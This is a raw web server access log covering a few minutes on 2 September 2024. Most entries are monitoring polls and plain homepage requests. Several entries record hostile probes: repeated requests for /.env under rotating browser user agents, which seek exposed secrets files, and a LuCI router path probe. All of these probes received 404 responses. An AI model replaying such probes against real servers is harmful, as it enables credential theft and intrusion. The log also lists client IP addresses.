45.148.10.251 - - [02/Sep/2024:16:24:54 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:16:25:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.52.167 - - [02/Sep/2024:16:26:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:16:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.45 - - [02/Sep/2024:16:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:26:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:16:27:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.156.68.104 - - [02/Sep/2024:16:28:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36"
94.156.68.104 - - [02/Sep/2024:16:28:06 +0200] "GET /.env HTTP/1.1" 404 309 "-" "mukewang/7.2.0 (iPhone; iOS 12.3.1; Scale/2.00) webview"
94.156.68.104 - - [02/Sep/2024:16:28:06 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1"
89.190.156.137 - - [02/Sep/2024:16:28:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:16:28:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:16:28:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.156.68.104 - - [02/Sep/2024:16:29:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; ELE-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.246.72 - - [02/Sep/2024:16:29:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.156.68.104 - - [02/Sep/2024:16:29:47 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
94.156.68.104 - - [02/Sep/2024:16:30:18 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
